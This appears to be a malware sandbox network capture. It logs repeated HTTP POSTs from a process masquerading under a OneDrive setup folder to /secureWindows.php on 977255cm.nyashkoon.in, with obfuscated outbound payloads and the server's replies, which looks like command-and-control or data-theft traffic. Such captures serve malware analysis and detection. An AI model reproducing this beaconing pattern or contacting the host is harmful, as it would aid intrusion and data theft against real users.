                                                        Oct 30, 2024 05:22:31.113405943 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:31.464392900 CET | 1076 | OUT | Data Raw: 52 52 5c 53 55 5d 53 57 58 57 50 59 55 5c 5b 59 54 53 5c 5c 59 55 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RR\SU]SWXWPYU\[YTS\\YUZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;.^+^9'[?D9#$=-)(Z #&0?C!$8>:: F$,Z*5


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        28 | 192.168.2.4 | 49764 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:31.508161068 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:31.855062008 CET | 1340 | OUT | Data Raw: 52 53 5c 52 50 59 56 56 58 57 50 59 55 59 5b 5a 54 5c 5c 59 59 56 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\RPYVVXWPYUY[ZT\\YYVZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%];32=;&]0>(:%4$=/47*1?]+52$89 F$,Z*!
                                                        Oct 30, 2024 05:22:32.107992887 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:32.443999052 CET | 934 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qRFeLqp%2Fhlhjp2XNEHDaaQMH5Hy9IVOgCHC1YshqalafjlUZcNuoMrnRUflhtC6rSEhkJpBBVxyyiknwnrrjCWku1rCHoWHydGAyw0b%2BmEXVDBR1BQuG8KfSFPet3aQBd0xXUqEfI%2Bg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89ff25adcc872-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1624&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=936005&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 25 0e 3c 28 2c 1d 32 55 2d 03 29 2c 3d 10 3e 58 26 15 33 0f 2b 07 25 2c 0c 58 3c 15 3f 10 29 1d 28 10 3f 32 09 00 23 36 33 01 29 3b 2f 46 0c 10 27 1d 26 31 28 0b 29 30 39 11 3e 3b 30 04 23 30 29 04 29 29 3f 56 35 30 24 5b 33 21 2e 57 2f 2d 3e 1d 2e 1b 32 12 2e 23 34 52 2a 3a 21 57 08 14 22 10 25 02 33 5c 32 03 30 59 25 0c 04 5b 34 59 23 1f 35 15 0f 05 28 38 34 55 32 33 23 01 30 0d 20 0f 31 17 05 06 3c 21 23 57 32 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98%<(,2U-),=>X&3+%,X<?)(?2#63);/F'&1()09>;0#0)))?V50$[3!.W/->.2.#4R*:!W"%3\20Y%[4Y#5(84U23#0 1<!#W2"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        29 | 192.168.2.4 | 49765 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:31.640053988 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:31.995739937 CET | 1076 | OUT | Data Raw: 57 5f 59 56 50 5a 53 50 58 57 50 59 55 5f 5b 5a 54 53 5c 5a 59 56 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_YVPZSPXWPYU_[ZTS\ZYVZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%-0>\+90><:C+$= [/)$\4'X2)$(6&8=X.* F$,Z*
                                                        Oct 30, 2024 05:22:32.417898893 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:32.454818964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:32.542638063 CET | 790 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fT1seBa3%2B3fB1lkgApxdJzn9iWRYBB6pyS%2FUeAC29ZVdTAi4nrD5K7Fj4pe05OTG3eLatv5UB%2FkLgzdC7mJMsLhsF9o3EThCocGapUNE7EcN5%2Ft2y23Cur%2BbtrQiaHfWyuXdXq9fmNg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89ff32c3b2cc7-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1292857&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        30 | 192.168.2.4 | 49766 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:32.669368029 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:33.026966095 CET1076OUTData Raw: 57 56 5c 50 55 55 53 56 58 57 50 59 55 51 5b 5a 54 52 5c 58 59 50 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WV\PUUSVXWPYUQ[ZTR\XYPZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^83:?(=$<-5(1=^; *+Z&_ +%'8.* F$,Z*
                                                        Oct 30, 2024 05:22:33.268182993 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:33.465444088 CET | 787 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pbK5o48WaMvTIoelNHLZIntbpHzK%2BeXq796P%2FPLU05qlDyGnbLOzVfrqEvu59oYOvMku8Tx%2FMylBWLkCJw5Igld2hYyPWEsP%2FQ2BeZfQar5wVLCzGSJRbq00k4VIZ8EEKMj8tjca8M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89ff999c32e21-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2069&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=707031&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        31 | 192.168.2.4 | 49767 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:33.595273972 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:33.949769974 CET1076OUTData Raw: 57 56 59 56 55 5a 53 52 58 57 50 59 55 5c 5b 58 54 5e 5c 58 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WVYVUZSRXWPYU\[XT^\XYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/==(>'=7A,&/$>;-* ]1$+5'6: F$,Z*5
                                                        Oct 30, 2024 05:22:34.197993994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:34.422835112 CET | 794 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pScZ%2FvaXRp4QxkUxGuI3jLrj7oIQLrlklWmSsXW%2FiJxxJ3dGHQmsDivGKlAaIDlzo%2BTMjN0WLjaHSUFnoeyzXiOrUet4KUWQymHTIQo%2FoeGzsg2w1AWM%2FUenhjr%2Bs2okouP%2BQ7iiJOQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fff6efb3156-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1333333&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        32 | 192.168.2.4 | 49768 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:34.546958923 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:34.937462091 CET1072OUTData Raw: 57 5e 5c 55 50 5d 56 51 58 57 50 59 55 58 5b 53 54 5b 5c 59 59 52 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\UP]VQXWPYUX[ST[\YYRZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,3-?8.Y$.+@:&7%>;/\' 9?Z%:++%$(!X9 F$,Z*
                                                        Oct 30, 2024 05:22:35.156927109 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:35.461256981 CET | 778 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56YPrD4Q1GZu1ielfLGdc05dGnej9GwKjElim29l6ZPONVK0%2F0MxKmudQ8e23dwl5f0MCwWDB2G2CTaqOLWaWxx7egLlWXuo0qSMLMy8npnv5W54yC%2BsFhf0gfc427KjdMORNoXqtSk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a005690ea924-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=753774&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:35.461453915 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        33 | 192.168.2.4 | 49769 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:35.656249046 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:36.011576891 CET1076OUTData Raw: 57 5f 5c 5d 55 55 53 55 58 57 50 59 55 5b 5b 5a 54 5f 5c 54 59 53 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\]UUSUXWPYU[[ZT_\TYSZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&-32Y(+>Z$>'D-54&8[/ */Y&:?]?&&';=/: F$,Z*)
                                                        Oct 30, 2024 05:22:36.272736073 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:36.572256088 CET | 792 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iFeDAWpHDLaeHOgyyXnuGcyoBzfad0%2FQvnYUaaPb2lw37cC7oskyyuWh39303P%2BrAbDcIpmH2WvD4MeT5UP2O%2BfR0MmtnYwQ9lNFEEQfByhFvqhlGa64Vm%2BE%2F%2BbM41cgmauw645q1w%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a00c4d9b28b3-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1377&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1085457&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        34 | 192.168.2.4 | 49770 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:36.702848911 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:37.058192015 CET1076OUTData Raw: 57 5e 5c 57 55 55 56 50 58 57 50 59 55 5c 5b 5c 54 5d 5c 59 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\WUUVPXWPYU\[\T]\YYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,%?(*$=?D-%0&;-);":Y1??:'9 F$,Z*5
                                                        Oct 30, 2024 05:22:37.323285103 CET | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        35 | 192.168.2.4 | 49771 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:37.456464052 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:37.808242083 CET1340OUTData Raw: 52 54 5c 50 50 59 53 52 58 57 50 59 55 51 5b 5d 54 52 5c 54 59 53 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\PPYSRXWPYUQ[]TR\TYSZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,1?8-'?: Z%-0[-)(["*;[&)?^?=[385:: F$,Z*
                                                        Oct 30, 2024 05:22:38.131815910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:38.359138966 CET | 937 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFQLp4CVxKNe2XRu3CWWPuEL6uCQ5tyw1UipyaVNc23JEZGN4fWtWYm8ux8TNeHfsjzo%2BVu%2FyaJ5%2FrQe5HeLXw2WnBK2na1Mtjd9QvfBG3claI6Qmmi%2BwoUw6kY8QoTcSKG11nlOO6k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0177c9aeb2f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1233390&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 1e 2b 06 20 1d 24 23 0f 01 28 3c 04 03 3d 2e 22 59 33 32 3f 07 25 3c 21 07 3c 3b 33 59 29 24 3b 06 29 21 27 04 37 18 30 5a 2a 11 2f 46 0c 10 24 02 30 54 37 1c 29 33 3e 03 3e 01 2f 17 20 23 21 01 3d 07 23 56 22 30 28 1d 26 22 3a 53 38 03 3d 0e 3a 25 3e 13 3a 0a 2c 1e 3d 3a 21 57 08 14 22 59 24 3c 2f 5f 27 2e 27 05 32 0c 3e 5b 37 2f 20 00 21 2b 22 10 2b 28 20 56 26 20 24 5a 24 20 28 0c 25 00 30 5b 3f 1f 2b 13 31 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&+ $#(<=."Y32?%<!<;3Y)$;)!'70Z*/F$0T7)3>>/ #!=#V"0(&":S8=:%>:,=:!W"Y$</_'.'2>[7/ !+"+( V& $Z$ (%0[?+1"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        36 | 192.168.2.4 | 49772 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:37.575124979 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:37.933491945 CET1076OUTData Raw: 52 57 59 56 50 5d 56 55 58 57 50 59 55 5c 5b 5c 54 59 5c 5b 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RWYVP]VUXWPYU\[\TY\[YVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^/#:?^.X0<.67$-8^/) Z"*/\1+_?9^3+)-* F$,Z*5
                                                        Oct 30, 2024 05:22:38.180978060 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:38.557060957 CET | 790 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVa3TloPXnZMj%2FxxlMdO9lLBKoBPqg8a79AyUJaMLMOP8MwdFECExqb1uOq3LvyHFfv5jz7ZbrhhVFn5Eh8Q62Q%2BcmjeXUA%2BRMkDwmYTtF7hziq%2FU6q4Nbi%2BhKNJJwnxZFkNurU0TEw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0184e68486a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1201&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1224006&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
